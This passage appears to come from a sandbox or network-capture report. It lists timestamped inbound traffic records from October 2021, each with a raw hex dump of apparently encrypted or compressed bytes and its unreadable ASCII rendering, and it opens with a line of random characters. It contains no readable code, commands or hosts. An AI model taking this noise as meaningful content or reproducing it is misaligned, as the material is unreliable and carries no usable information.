AfF+#65QxSoz<xDT%nnq?Ou6xU[-mJe8`(n~/"4RCh9NE(k4F7nyh[%4'dTx[fMGiZILXhNB/0v5z:?p"0ypL2$Wd)b:?gP
2021-10-13 13:52:05 UTC	629	IN	Data Raw: 90 40 c1 de 41 ee 5c af 84 32 39 4f 94 59 01 3e 68 3b 6a 5d 5e 27 42 cb 14 14 6a 8c 9a 7c 29 ce 15 77 c2 9e 6a 0e ae 81 d4 6d dc 1c ed 6d c4 ef ef ca f7 11 fd 51 69 9b cc 92 e5 b7 49 9e 1a 23 38 6a ad cf dc 90 08 89 bb 38 57 4c 53 65 98 57 a9 51 84 7a 14 b5 53 be 3b 0f c2 b9 27 f8 9b d8 fa 0a 56 d6 b7 f7 87 d8 17 70 3a 0a 9d 5f cd 49 bd d1 0a 61 43 ff 89 9d 56 d0 84 a9 27 1f bb b6 e0 57 15 24 a9 6f bb de f4 8c da bb 61 b8 14 73 e9 18 a4 1c 80 32 f2 9c 68 22 c0 3f a0 f2 eb 33 95 9e 60 4e b8 5d f6 92 be d5 b4 aa 97 52 1e 09 0a 7c ec 2b d0 c3 ca 15 b3 f5 3c 96 a4 9c 19 bc e1 36 79 08 2c 62 97 90 e9 66 fd d9 7b 8f 1b bf 55 c0 a5 e9 b2 34 51 80 2f fd 1c e9 80 f4 1c d6 74 e4 7a 06 8a ef eb 37 9a 5d 3e b6 1b 6f c4 75 36 da 61 bc b8 3f 4e d3 ff 6b a8 d4 5b d6 93 Data Ascii: @A\29OY>h;j]^'Bj\|)wjmmQiI#8j8WLSeWQzS;'Vp:_IaCV'W$oas2h"?3`N]R\|+<6y,bf{U4Q/tz7]>ou6a?Nk[
2021-10-13 13:52:05 UTC	630	IN	Data Raw: 49 70 b8 0b 89 e7 85 d6 89 02 52 ed a7 44 27 3c 1d 37 df 3b 3a c0 14 92 b9 fa d8 10 22 36 62 2b e0 d8 bb 15 05 32 fa d8 df 26 6e d5 fc 66 ca b2 00 e5 6a 68 de 20 ed b5 cd 03 9f 7e 0d 43 b7 56 e1 03 a5 57 7f 61 c2 28 25 e0 20 42 5e d7 24 d1 59 a1 07 92 c9 ea 60 e8 0d 85 b0 e2 71 90 16 e7 ef d5 ef 16 7a 5c 71 36 aa 03 26 a6 21 75 67 11 c7 e6 99 13 b1 4e 45 61 3c 93 91 41 8d ba 38 a0 93 a1 62 43 ee dc dd 63 b9 e2 d9 d7 23 c5 fc 9a 7d 99 75 a5 e2 9d b6 95 6f b6 7d a9 1b a9 21 25 73 61 04 db 73 71 e7 87 a4 cb 50 c4 9c 33 d4 85 a9 17 25 8f ab 65 e6 03 a3 5f bc 73 3d 82 7e d9 c6 5a 4b d8 cd c7 9d b8 69 90 38 78 69 d9 a6 03 3f a9 64 97 28 6d ed 11 c0 46 ad cb 5c 64 e6 5b 46 ff 62 7f 53 a1 01 d2 1a 90 78 0e 6c 7b ac 7b 51 60 ce 51 a2 71 03 00 3f 74 96 29 3f 40 35 Data Ascii: IpRD'<7;:"6b+2&nfjh ~CVWa(% B^$Y`qz\q6&!ugNEa<A8bCc#}uo}!%sasqP3%e_s=~ZKi8xi?d(mF\d[FbSxl{{Q`Qq?t)?@5
2021-10-13 13:52:05 UTC	631	IN	Data Raw: b9 74 d4 ef 21 d8 63 cf 0d fa 42 46 3a 8a 19 4c b5 24 b1 f1 84 77 4b 0e 55 c4 1e 58 eb 77 42 41 e1 43 bb 24 c8 86 d9 b7 fe b7 09 47 6c 9c fe b3 96 e5 b8 6e 46 5a 5f 3f e1 5c bf 9b 1f bc 69 20 b9 66 48 c7 1f ec 08 ff 4b d2 3e 4a be c5 8e 30 c8 a6 6a 2e 5b 63 e2 6d 9e cc ac 9c 9d d2 f9 c2 c9 22 00 79 df 6a 4d 2d 3c 48 35 26 f2 27 a2 82 58 d4 3f fe d7 5a 21 d2 d9 49 22 4f 75 28 28 31 a4 fd db f8 03 61 b7 86 9f ac 7a 76 e4 b9 d9 3b 0d 7a 99 81 d8 65 6e 8b 89 01 05 de ce 7c 74 22 9e 53 5b a6 e6 80 f4 1b c0 ba 97 80 a5 e6 3c b2 7e fa b7 be e8 24 06 25 fa c8 47 97 23 c6 30 1b c7 62 10 e4 cd 4e 6a 21 0a 59 d9 31 db d9 1c f4 41 f3 11 65 13 52 20 46 59 5d 17 6e e5 ee 77 f0 b3 10 68 ab dc c3 cd 3d b9 c3 0c 0b 77 8a 4f 0c ab 8a d1 b8 76 80 a9 05 c1 ee 25 a2 92 8a 4f Data Ascii: t!cBF:L$wKUXwBAC$GlnFZ_?\i fHK>J0j.[cm"yjM-<H5&'X?Z!I"Ou((1azv;zen\|t"S[<~$%G#0bNj!Y1AeR FY]nwh=wOv%O
2021-10-13 13:52:05 UTC	632	IN	Data Raw: ea 09 49 a9 21 56 ba 25 4d 14 8d 40 54 d6 2c 63 b3 52 fe 03 f8 d9 ff 5a 3c ad dd 48 28 ba af e0 46 eb 4d b6 c6 d7 45 f1 15 6d ac 22 b9 4c 0e 91 d9 62 55 6a 3f 8b 0f b0 08 b9 4d 6e b3 72 75 cc e9 64 63 24 8f 5d 0a 01 16 b4 81 f8 71 51 dc 19 46 4c fd d9 24 61 b1 65 53 c9 40 09 e7 65 b0 f5 b6 99 bc 9f bf 32 55 73 a9 90 c8 1d 4e a4 38 67 e9 79 be b7 82 72 1e 82 db fd 5d 60 9c 5a 1e 87 0d 58 b3 a9 ee e7 6f e5 a7 4d 61 28 db 5f fa 9f 82 ed 72 96 47 84 54 52 84 2c 82 50 9c e9 c1 46 a2 3e 38 0f e7 f7 c9 68 14 a7 03 3e b9 9b 77 0e dc c0 74 39 03 90 e6 b7 69 5f 0b 46 b8 bb 7c bf f8 7a 2d 32 13 8d 76 1e 9a d2 ce 87 7f 2a bc 83 94 83 41 e8 90 a7 7a a8 f6 c3 0a 0a 19 df b1 3b 7d c4 7f 53 2f 2d 3a 72 57 43 ac 1b a5 18 a5 d6 b6 b8 71 00 ad db 60 d5 33 fa ae 7c 46 43 ab Data Ascii: I!V%M@T,cRZ<H(FMEm"LbUj?Mnrudc$]qQFL$aeS@e2UsN8gyr]`ZXoMa(_rGTR,PF>8h>wt9i_F\|z-2v*Az;}S/-:rWCq`3\|FC
2021-10-13 13:52:05 UTC	634	IN	Data Raw: f5 f2 29 e0 bb 86 18 10 4f 83 d7 28 f1 74 0e 52 e8 80 81 14 bc a8 f6 87 03 b5 d7 4c 38 30 07 55 6b 6e e8 ed 52 a7 75 21 4f b5 e9 67 b2 c1 16 78 25 60 09 22 19 38 f8 49 f1 7c e8 1e ea 65 28 56 ef 28 bd 0b 8d ac 9a 3a 02 e7 8e 95 a1 f7 06 27 34 7b be 20 73 f3 a2 c3 31 ae 74 84 85 f3 2a ba 7a d8 64 c6 27 95 61 4f e9 d2 3b e5 46 ad 43 f4 c0 6e 1b f6 e2 ed 1d 77 ac 8b 77 30 65 f8 08 64 70 e3 e6 3b 1f 47 df b0 44 80 27 d2 93 80 c7 14 41 32 19 0f e0 bc b5 72 c6 d2 dd 15 5c 2b 7d da 51 21 ba 6c 6c df cf e0 f2 5b f1 be a8 35 85 0b 8d 64 4c 28 30 cf 98 98 14 6e 12 57 11 d1 e1 63 cc 56 d8 ba 5e 70 57 51 d5 b2 ed fd 52 45 bf c1 62 80 15 f5 2f ca a4 f8 41 60 0a 82 66 43 7f 15 cf 51 b8 df 57 0b b3 71 a9 e3 05 df 93 4e 86 79 f4 c8 18 95 22 37 f2 43 f0 17 83 a3 60 12 f2 Data Ascii: )O(tRL80UknRu!Ogx%`"8I\|e(V(:'4{ s1t*zd'aO;FCnww0edp;GD'A2r\+}Q!ll[5dL(0nWcV^pWQREb/A`fCQWqNy"7C`
2021-10-13 13:52:05 UTC	635	IN	Data Raw: a3 d4 b6 f6 83 b8 df 44 31 9b 8c bf ae 3c 3b bc 7e c7 bc d1 98 2a a8 63 64 28 92 49 1d 61 9b 13 f9 bc 08 26 de 71 30 95 72 c0 8b c0 73 27 7f af a0 7f b5 76 6f 44 75 9e fc 45 c9 47 33 06 b6 0f 74 16 49 4a 95 0f ad 69 d8 38 09 b1 ac b6 b3 fa e4 26 6e 91 b3 4d 71 82 4d 36 16 ff 51 2b d5 c0 d2 8a f6 d6 e6 b7 cf c2 91 ac f7 9c df 4a e4 19 56 2c e4 33 d4 8a 1a 52 96 18 44 24 70 e5 9e a6 15 96 e9 01 79 ab b4 2b 7c 8f 86 80 ae fb 2b 00 14 cb a1 22 17 ef dd a5 70 18 f8 b2 5f 07 c3 31 3f 10 72 ab b1 26 d5 63 18 d4 ee fd 2d f0 58 e1 5b 27 be 33 fc 27 fa ce 87 1b fa 8f 7d 41 22 62 0a e7 68 c4 7d 23 f3 90 ea 72 32 66 1c f6 2b f8 46 57 29 6e 64 d2 a4 f7 4a 82 07 aa 63 d7 14 05 d1 5d 58 53 5a 9b 4d 67 fc 5b 2c 41 e9 c7 ec 4a 98 de 38 8c 01 c5 55 b6 dc d1 66 a2 a2 5e 73 Data Ascii: D1<;~*cd(Ia&q0rs'voDuEG3tIJi8&nMqM6Q+JV,3RD$py+\|+"p_1?r&c-X['3'}A"bh}#r2f+FW)ndJc]XSZMg[,AJ8Uf^s
2021-10-13 13:52:05 UTC	636	IN	Data Raw: 21 d2 ce c2 17 73 18 c6 f8 92 47 b7 57 01 4c 44 cd 27 ac 19 7c eb af e1 2c ea 44 8e f8 3b d0 7d 48 5d 2e e9 a2 dc a3 28 6c 67 69 fa e1 79 86 72 16 64 71 32 fc ce 4b 83 2f 7b dd 47 e5 25 4d 3e a3 0f 5e 9f ea a5 21 e7 f5 e8 b0 a6 76 6d 0f 79 9e ed d9 87 86 a1 09 01 15 05 7e 87 2e 40 a3 57 2d 8a e1 b8 01 3a 72 a7 95 d9 b9 8f 73 75 56 66 de 9c d7 09 18 58 b1 44 73 f0 3c 3c 79 a6 7f 52 f6 bb 14 07 60 42 78 bc e3 a0 be db aa e3 72 33 c1 74 f3 9f 52 fc 15 e6 d8 1a 02 d6 15 c3 69 ad 58 0c 02 2d 07 ff 69 a0 73 9d 80 8f 92 2e cf 66 cb 40 31 57 a7 fe cf 0f 10 8e cc a2 ff a6 60 b5 08 d2 ec 11 da f4 3b 31 d8 6c f5 37 97 79 50 fe d2 6e 08 ea 75 17 30 33 83 ad 0b 27 d3 83 74 fd bf 0f b4 80 e7 71 fe 6a bf ce e9 99 ac 52 9d 14 1d a8 4f 52 36 d7 da d3 0f 96 65 92 95 c1 7c Data Ascii: !sGWLD'\|,D;}H].(lgiyrdq2K/{G%M>^!vmy~.@W-:rsuVfXDs<<yR`Bxr3tRiX-is.f@1W`;1l7yPnu03'tqjROR6e\|
2021-10-13 13:52:05 UTC	637	IN	Data Raw: 20 cc c3 d9 8f 43 d4 09 d5 13 79 52 8a 81 a0 4e 0d a6 f4 5c 07 ed ac 53 d4 06 3d e4 7c ea ff 5a e8 d8 6d 69 16 af 6f 9d 76 49 da 9f e8 14 ea 52 84 1e 13 38 19 5d e7 cc 97 8a 17 82 73 6e 9e 27 34 be 76 71 77 0a d0 60 67 6d 18 cc 34 9c de 3c 2a 46 41 ae 8f 3b 14 49 7f 4b 87 44 7f 6e fc f4 0f 9d 61 e0 4d 8b 43 a1 aa b0 5c c2 cf 94 62 34 b6 46 34 70 d6 c7 a6 16 a1 31 a6 7b 8d 85 f3 50 8a 72 40 f4 11 17 66 6c 42 74 98 04 29 7b 9c 50 41 9e be 40 e4 5e 1b e3 16 60 b5 60 42 e3 5c 04 b5 73 b9 8f 39 f3 1e 98 7a 51 65 02 ae d6 b5 c0 4d c1 28 2c 4c 94 57 6a cf a8 c7 9f 24 01 2f 57 d2 33 56 7c 59 50 54 5c 57 84 7a 5b 96 40 5e e6 12 ca 72 c5 90 1a 6d 7c cf 1b c9 29 f0 87 e6 f6 2c 71 4a d2 f1 28 46 51 92 9f 15 3e 88 dc 24 d6 35 ce b7 a8 d8 d3 c4 05 79 70 d7 65 85 4d 22 Data Ascii: CyRN\S=\|ZmiovIR8]sn'4vqw`gm4<*FA;IKDnaMC\b4F4p1{Pr@flBt){PA@^``B\s9zQeM(,LWj$/W3V\|YPT\Wz[@^rm\|),qJ(FQ>$5ypeM"
2021-10-13 13:52:05 UTC	639	IN	Data Raw: 2e c8 cc a1 46 47 84 7a d4 01 e7 63 9d ad 72 cc b9 60 f2 bd ec ac a7 2c 04 25 18 6f 4f 08 ef 71 55 a3 44 e4 20 c7 3f 57 96 78 67 e0 d1 da f1 b3 45 5b 66 4d 1a 71 68 8d ca 16 1f be d3 35 64 8b 28 47 1e 3c 48 ec 41 e3 90 89 13 8e 5b 10 d2 8f 37 db c2 af f9 29 e0 60 59 0c 55 f8 a0 08 03 2a a8 e6 dd 29 c9 80 de fc c5 a0 01 3c 79 7f b7 61 11 68 25 28 87 f3 25 bf 02 fc b6 8f 01 7a b8 18 93 b5 72 03 05 3f 4e be b8 7f 4f 82 41 37 85 0a e5 0e cb f6 3c 04 8a 01 3f f4 ec b6 9f 89 62 2d a9 93 79 d8 96 a5 31 90 4c ce d6 5d a9 a2 92 4a cd ed 9a 14 47 59 ba 66 71 8d a4 f8 30 a2 4e 13 68 d3 45 63 37 76 35 43 24 28 31 cb 81 0c 7a 2c d5 93 58 8e 35 23 fc 89 c0 50 b6 b6 a1 73 e4 6d c9 44 02 6d 08 dd 09 61 01 91 51 f2 4c 88 f3 af 1b 98 df 44 e8 e6 93 e3 8c 48 58 79 6e 3e fa Data Ascii: .FGzcr`,%oOqUD ?WxgE[fMqh5d(G<HA[7)`YU*)<yah%(%zr?NOA7<?b-y1L]JGYfq0NhEc7v5C$(1z,X5#PsmDmaQLDHXyn>
2021-10-13 13:52:05 UTC	640	IN	Data Raw: 2d a3 0a cd d1 0e a3 66 22 2f f1 32 29 c7 fd 10 67 06 41 28 55 3c 35 55 78 af 29 89 3c 09 98 b6 95 09 17 3e 9b 1c 4e 00 06 3a 2e b4 0f 60 9b 12 d6 c5 e1 cc 00 55 e2 98 20 54 e3 75 3d 70 ca 38 b1 40 f1 c0 dd ce 6d ac 61 d2 78 59 19 1c ad 06 5c cc a5 96 b6 6c ae 97 2e 1d 35 19 e6 ec d9 c7 67 14 a7 d3 4d 5f af 08 4c b1 f6 af 40 8b a0 c2 d7 10 35 1d 69 1f c0 78 8c 82 2e 7f eb c9 59 18 d4 df 2e b0 55 4f b5 36 9b 4c 6c ee 19 cb 59 f9 ac 86 36 66 93 41 54 87 5a a9 df 70 1a a1 44 23 b0 56 0d e3 cc b5 24 b1 c1 8f e9 88 0d 1f ea f7 39 2e 56 9f a9 9b 1f 62 fd 6e ea ac 2a db 4a c9 1b f7 21 08 e8 b5 7d ba 88 25 42 b7 74 db c6 83 df 3c f7 c2 d5 2a 18 3c f6 42 42 d7 52 bd 98 24 74 61 cc fa 31 39 91 f4 a8 17 a1 8a 3a ed 35 77 65 df 74 d4 99 d0 67 8a 45 65 d4 9c c6 d9 c2 Data Ascii: -f"/2)gA(U<5Ux)<>N:.`U Tu=p8@maxY\l.5gM_L@5ix.Y.UO6LlY6fATZpD#V$9.VbnJ!}%Bt<<BBR$ta19:5wetgEe
2021-10-13 13:52:05 UTC	641	IN	Data Raw: 96 5d e0 3f 8d 86 76 24 55 e3 10 ee 37 64 18 f5 e5 4d 5f 6b d5 be 11 a7 3e ed dc 2a 03 d0 db 39 d3 37 6b 60 32 fd 44 3b 3b a0 ec 7f 58 36 44 01 93 80 76 96 64 b0 41 1c b7 1f 13 8e 5f aa 03 f4 45 58 37 a3 e9 7b f7 76 38 7e ae 0b 98 04 87 8e 5f d4 58 99 49 73 14 88 f5 ed 9d 3f a8 5d 3c 5e ca a0 7a e6 37 a7 fd 50 e2 16 a1 47 3a 4c fa be c0 5d 12 04 ff 03 b4 9d b5 2c 41 7e d7 82 0f b5 c5 64 54 8b 29 8c 7c 72 3e 65 24 10 36 08 02 e1 ca 45 68 45 dc 3e e5 1b 9e 44 10 18 e2 dd 46 47 83 dc f2 76 2e d7 4e c4 cb 98 fa b6 e2 6c 28 e1 6c 34 86 50 aa b4 8c 4c dd b9 53 a8 2b d0 4a f2 66 5c f0 58 3a 4c 7a 79 6a 7d 20 99 67 e0 4e f7 57 03 d4 49 3d d5 07 be 65 06 1c 2f 9c ef d8 cc 95 0b b7 c6 a5 09 ab 1f ca 9a 43 7c 32 d3 46 82 32 f5 ba 4f d1 35 01 97 e7 46 ff 3a f9 b5 3b Data Ascii: ]?v$U7dM_k>*97k`2D;;X6DvdA_EX7{v8~_XIs?]<^z7PG:L],A~dT)\|r>e$6EhE>DFGv.Nl(l4PLS+Jf\X:Lzyj} gNWI=e/C\|2F2O5F:;
2021-10-13 13:52:05 UTC	642	IN	Data Raw: 94 ec 04 99 f8 1d d2 4b 2e 11 23 e1 4b 84 cf 90 20 a8 4f d9 92 37 aa 0d e0 f0 86 6a 52 da d7 f4 d9 eb 0b b2 a6 9b b6 ad 88 c4 53 08 50 99 6c e4 7f e5 80 0a f6 0a 7b 45 89 b3 58 99 84 3e 5c bd c4 f1 e9 e6 6c 46 13 1b 6e 66 40 53 9e 78 d9 b7 8b a7 6b 7b 8f 43 cc fa cc f2 9a b5 d2 fc dc e8 23 36 6f 66 34 66 58 98 5b 7a 2a 44 77 dc 22 6f 05 7d 2a f9 72 5a 91 c8 af 83 dc 0f 9c 19 68 35 29 c0 a6 8f 08 e4 74 eb 46 65 a8 48 56 0c f7 4e 33 79 df 4a 29 1c 10 95 0e 16 68 2d 87 b0 68 24 a3 a0 14 19 7e b7 e8 3c 8c 97 2f a3 76 c3 b7 de ba 62 1f 5b 88 50 0a f3 e3 7d 76 6c 92 0a ea e0 53 6c 6d 6e a1 39 f8 3b 54 1c 0b b1 00 d5 b9 3a 8f f3 f1 30 85 7f 3d 58 e0 62 b8 d5 7d cf 05 24 45 01 f1 5e c7 34 ed 19 4b ca 39 a0 95 9e 92 15 62 6e b5 6e 0e d2 e0 a5 01 95 5e 81 ad 90 a1 Data Ascii: K.#K O7jRSPl{EX>\lFnf@Sxk{C#6of4fX[zDw"o}rZh5)tFeHVN3yJ)h-h$~</vb[P}vlSlmn9;T:0=Xb}$E^4K9bnn^
2021-10-13 13:52:05 UTC	644	IN	Data Raw: 36 c9 00 bd 4d fe 09 ae c6 9c df d1 76 84 72 e8 81 f4 f3 df b7 80 a7 9e 1e 2d 21 43 63 ce e7 f0 7c 5d 6d 38 f0 6d 80 85 52 26 87 96 39 7c 06 c9 de bd 09 0d 87 2a 8a 66 18 3e 9b 19 98 59 6d 4a 6b 91 44 4c 4b 78 39 de 8b 6d 44 5b 4f da 4a 01 ae 42 c1 22 06 4c 59 be 23 55 d0 46 ec b0 4f aa d9 f2 a5 4c a6 f7 da 4a 67 51 c8 e9 26 e1 4b bf ac b1 ab 04 56 86 e9 0d ac 21 19 2d 3a b0 89 48 27 89 68 32 7c dd ed 17 0f da d7 35 b0 d2 f9 6d 2d 84 2b b2 b5 05 5a b0 79 0c ce ec 2d 88 f5 7a 1b d5 21 df a5 78 eb fa 77 f2 8b 8b 4d 7b 48 7e 3e 4f fd 3b f3 92 4a 47 77 11 e6 26 05 49 54 fa bc 3e da 5b c7 6a 4e 6a c1 d2 2b 5a 08 f2 00 76 9c 53 d0 d6 c3 3c 6e e4 aa 95 77 c9 0c 10 c1 06 af ef 69 5c c9 67 b9 41 17 35 d4 67 0a 47 ea f3 7f 46 91 1a e5 36 27 53 f8 ba b1 88 6f 2b 4b Data Ascii: 6Mvr-!Cc\|]m8mR&9\|*f>YmJkDLKx9mD[OJB"LY#UFOLJgQ&KV!-:H'h2\|5m-+Zy-z!xwM{H~>O;JGw&IT>[jNj+ZvS<nwi\gA5gGF6'So+K
2021-10-13 13:52:05 UTC	645	IN	Data Raw: 0c bc 66 e0 48 e8 4c 22 b7 b3 93 2e 2b c6 f6 f5 96 36 ae 7b 1f 48 06 f3 50 f6 ed 20 df a6 4e 4b 4f 86 b1 de b7 ab d9 49 df b6 78 26 82 b8 90 95 10 95 be 4d af 64 38 b7 11 19 45 14 69 99 41 57 21 74 80 69 84 b6 7f db 59 30 bf dc fc dc 3f d2 34 b1 f7 68 e4 f8 07 b8 e0 21 a0 ff fa 14 25 09 ff d5 ed 10 31 a3 52 46 fe 1c 40 99 16 68 68 47 d2 b3 13 06 48 54 0f 92 6d 30 da bf c4 a4 55 f3 3d a5 bf 13 35 93 40 0a ec 60 1d d2 9d a4 db 3f 33 f4 b9 ab d0 f8 0a ca 13 d7 65 3a 5e 6b c8 1c 20 80 f4 5f ce bb be c9 7e 7f 44 6a 1e 72 3a 56 28 32 f5 fd 25 1d 1e c0 41 8b 21 a1 80 83 07 3b 03 12 62 cc 64 fa 89 d3 5b 3e 7c c9 b6 72 83 ef ac d0 7c 84 18 b2 6a 52 0c 4c f4 c6 5f 69 7b 67 a8 68 58 58 27 73 6b 11 4b 92 6b ba 45 25 60 55 ed c5 48 34 dd d7 db e1 f0 eb 65 fd c0 6a 33 Data Ascii: fHL".+6{HP NKOIx&Md8EiAW!tiY0?4h!%1RF@hhGHTm0U=5@`?3e:^k _~Djr:V(2%A!;bd[>\|r\|jRL_i{ghXX'skKkE%`UH4ej3
2021-10-13 13:52:05 UTC	646	IN	Data Raw: 03 05 4c e5 d1 d3 c9 a1 80 52 28 04 fe 33 10 dd 29 89 4e 84 8c 20 a4 e0 23 d1 5e 12 3e 84 37 5c 4d 7e df 4f dd cd b9 12 8a 38 e0 a5 9b 5f 96 13 d7 b8 58 cc 95 72 46 c3 1b d8 c9 7b fc b5 21 73 cd a9 0d 48 aa 44 55 e9 e8 72 ec 06 b5 c6 3f b8 eb 77 43 da fa dd f4 fc 1b db 53 0c 54 24 32 d4 ee dc cb 5d b0 6d ae c2 e0 f9 62 35 50 19 f1 0f bd 31 fb 9d 51 a3 ee dc c5 33 6b cd d2 61 dc c7 1d 2b 02 57 ce 02 be 11 aa fa 0d 50 2c 02 3d bf 0c 52 4a 47 e7 f7 4c b4 17 0e 99 0d 84 03 d4 96 3b da 1e ff 24 b3 8d 61 42 60 9a 97 23 3e e3 73 76 a5 22 7b 43 27 c1 4e e5 5d 94 36 d5 ec 6d 1a d1 b7 2b 6f d7 f8 c2 d9 08 fd eb 86 fc 6f 51 d1 0b cd 33 0b 93 a5 94 60 ae 89 1e b4 12 a6 da 72 f5 fa db 1b 4b b4 c3 fe 9b af 39 24 24 8f 03 5c 2e cd 1b 1e ce 19 92 06 cc 5e 0d 36 5f 04 53 Data Ascii: LR(3)N #^>7\M~O8_XrF{!sHDUr?wCST$2]mb5P1Q3ka+WP,=RJGL;$aB`#>sv"{C'N]6m+ooQ3`rK9$$\.^6_S
2021-10-13 13:52:05 UTC	647	IN	Data Raw: 55 68 f7 43 8c 5a c2 e4 31 95 14 08 dd 54 37 81 01 cc 1e fa ac bc 8c 82 92 79 b5 63 d6 b5 92 2f e5 4a 8b 48 75 40 8d 38 ca 1f 8d 0c 01 15 5a 86 eb 2e ed fd f4 ad 65 61 7c 86 1b cd f7 8e cf f9 f4 36 17 49 24 8f 9a 0d 44 10 07 e9 07 a3 aa ae f0 28 2a ac d6 a9 9e 6b e5 40 d9 66 e6 32 13 61 32 4d 9a 8a 1d dc 1b bc dd c1 f7 88 0e ea 41 fc ee 38 8a 76 b9 ac 21 ab 50 32 bf 73 a1 8a 8c 26 fc 00 f9 6b 06 bc ba ea d3 dc c8 3e 32 30 6c a8 cb d4 46 17 94 dd e9 a7 f2 59 6c 72 8e 7a 67 7b 29 93 66 2f 4a 38 26 e2 93 da d5 eb 70 64 d9 64 c8 8f fd 08 ce 60 57 ee 83 a3 fd 5c 2e f5 0c 21 ac cb 1a f6 d6 f9 d2 11 9a b2 21 d9 eb ea 17 7c ee ab 00 3e 43 41 52 b0 81 38 88 ff aa 00 8c 88 fa 93 ce 22 18 1c 5d d7 3e 00 d1 67 43 97 db 26 f0 31 bb c0 57 31 ca 64 59 fd fe cc 8f b0 a9 Data Ascii: UhCZ1T7yc/JHu@8Z.ea\|6I$D(*k@f2a2MA8v!P2s&k>20lFYlrzg{)f/J8&pdd`W\.!!\|>CAR8"]>gC&1W1dY
2021-10-13 13:52:05 UTC	648	IN	Data Raw: 72 d9 6d 68 f4 ea c9 17 cd f8 29 22 3f fa a1 7e 93 bb 42 85 ae dd e7 b8 d1 48 7c d2 8f 6f 55 2f ee 88 2e ab 7c 85 3a 56 c8 1b bd dd a1 75 a9 44 e9 69 c9 41 ff 0d 38 82 77 1b 2f d0 a0 1d 05 65 d5 d3 7a c9 9c 2a a5 d6 6e c2 37 73 6b aa ea 59 e7 8b fa a8 df 04 d6 ee 81 e5 5c 99 8a 3e 54 e0 9c a4 89 74 8b c3 3a 9f 8a 1a 19 85 20 e8 70 d4 44 ee 19 41 75 9c 96 12 f4 fb 0d a6 3c 16 1e 9d a5 0c a8 76 30 f6 94 85 61 26 f9 5a 84 9e 4f 2d 7e 11 53 60 a1 1a a0 8d 93 8c 7a 2f 3e 1f 54 0a 1b 1a 30 3e 5a 30 bd f6 f8 8f 1e 6f 70 51 54 2f 6a 4c b0 02 99 b0 cc 22 52 09 cc bb 45 51 c7 35 ae 06 55 2f 3d 49 ae fe af 4e 97 f2 6c 16 08 5a 5b c7 38 17 c8 c5 66 ff c9 65 2e 67 d0 6c a1 2e 95 d8 1a 98 a5 0a f4 55 24 93 ad 3d 7d 3e 8a ce d6 58 06 78 ba a8 21 33 c7 d5 06 ca 42 37 6d Data Ascii: rmh)"?~BH\|oU/.\|:VuDiA8w/ez*n7skY\>Tt: pDAu<v0a&ZO-~S`z/>T0>Z0opQT/jL"REQ5U/=INlZ[8fe.gl.U$=}>Xx!3B7m
2021-10-13 13:52:05 UTC	650	IN	Data Raw: b8 23 66 4d f4 6f 68 65 ae 56 9f 9e 04 3d 86 07 08 d2 05 77 b4 71 30 8b 5b 31 20 b5 2a f9 61 b5 d6 c9 e9 1a 45 68 b2 ad d7 8e 73 cc 25 3c 03 90 dc c2 e0 46 76 ec 07 fe 1c 5d 38 af a8 f8 2c 81 75 75 91 8e f6 d7 12 83 03 6e c8 25 34 e4 16 c5 84 20 a9 92 4e cc 8d 97 4d 77 3c 98 94 4b e7 5c ac c7 0a ba a3 b6 b9 fd 20 e4 91 b5 3e bb 07 ad c9 2b b8 58 80 81 f2 f8 45 e2 c3 97 0a 1f a8 50 d7 e7 73 5b 51 61 5b 93 4f ef 97 2a e9 85 d2 6c f0 dc 2c 73 be 1f 8c ef 27 47 19 9f b5 d8 2b 57 b1 df a3 56 4b 02 a9 5f 5c f8 3d 7b 80 75 33 6c c8 9d 35 0a ed f6 93 21 3e 4d ac 44 20 97 69 09 af c0 35 84 9d 86 2b 5c 54 e6 cd e1 69 81 38 51 27 15 9c c4 fb 77 00 83 13 1a 1b 99 90 85 91 99 06 13 c1 22 36 6b 61 d5 2c 82 c7 b9 16 54 33 35 b9 30 ae 4b 01 fe ba 31 d3 e6 3c f2 78 9c ea Data Ascii: #fMoheV=wq0[1 aEhs%<Fv]8,uun%4 NMw<K\ >+XEPs[Qa[Ol,s'G+WVK_\={u3l5!>MD i5+\Ti8Q'w"6ka,T350K1<x
2021-10-13 13:52:05 UTC	651	IN	Data Raw: 5f b7 41 6d 17 f6 f2 cf cc 5a 48 5f 32 a7 66 f1 54 5b 3d a4 96 54 81 ad 4d 31 d5 b5 27 e6 77 a6 21 65 b8 f5 8e b1 b5 5f 9c 69 16 36 2f 95 59 52 1f cd e3 b9 c9 a7 19 86 fc 6a 97 5f 4f a3 ae 8d b6 d8 65 9f b9 28 bf 2f ab 02 73 e6 c7 df df ee bc 9c bf 09 4e cf f1 e7 ea c8 26 fa 7c 73 1e 86 1e 81 d3 9e e2 7b 25 91 c8 84 90 af 90 48 ac cd a8 00 84 66 93 6e 30 4e 6b dd e2 f7 af d4 25 b1 27 70 9b 9c 87 1c 7f 80 7c 16 3d b5 8c 0d aa fa b9 2c 65 3f c2 9b ac 7a 26 06 67 91 3e ee 5b 1d 58 4e dd 3a 2b 2e 21 63 6c 3a 62 f3 34 4f d0 da 28 63 dd 84 91 9e ad 7d 92 2f 3f 93 64 4b e4 45 ef f0 e4 41 b0 86 5d ad c0 62 3a 72 02 86 de a8 12 d4 71 55 ea bc c4 da cf ea 9d df d6 11 5a b5 16 ec 08 12 49 55 96 4b ae 5e 97 56 86 6e ba 6e 1c 5a 32 4a ad 3d 2f cf 95 fa b3 3a 1b 66 13 Data Ascii: _AmZH_2fT[=TM1'w!e_i6/YRj_Oe(/sN&\|s{%Hfn0Nk%'p\|=,e?z&g>[XN:+.!cl:b4O(c}/?dKEA]b:rqUZIUK^VnnZ2J=/:f
2021-10-13 13:52:05 UTC	652	IN	Data Raw: 76 b7 e6 2c 3e 06 9f 13 59 b5 eb 31 2d c0 ed 96 64 f4 16 dc d0 fb 7d e2 22 3c 44 a8 be 2b 8e 49 08 14 aa 52 00 8f 4c 7a fa aa 62 e4 60 4e ad 37 7a 59 45 ad 78 df 31 06 2f 68 19 13 29 d1 6d b1 05 26 97 39 99 b6 a1 f2 0b d5 62 89 55 02 44 58 ec 05 db 10 2e f4 0a ea 69 17 0f 18 da e0 c2 a7 a3 49 40 6a 69 24 43 3e f7 ff e1 1a 46 89 2a 29 26 46 77 ea 6a bf 8f de 10 c7 61 e1 a5 ea 37 66 e5 0b 98 ac c5 a8 3a 04 be e4 b6 7c 23 ac dc 5c 36 18 ef 3c b5 ef 2f a0 13 38 6e c3 f1 ef 03 b1 4e 29 cb 8b 67 d0 66 48 a5 b6 a2 55 cd 79 0b da a3 96 d6 02 fe 29 29 13 b6 98 91 60 f7 16 b2 0e 28 cc 55 00 8e cf 7e 60 96 49 51 e5 de 48 7c 68 58 35 1d 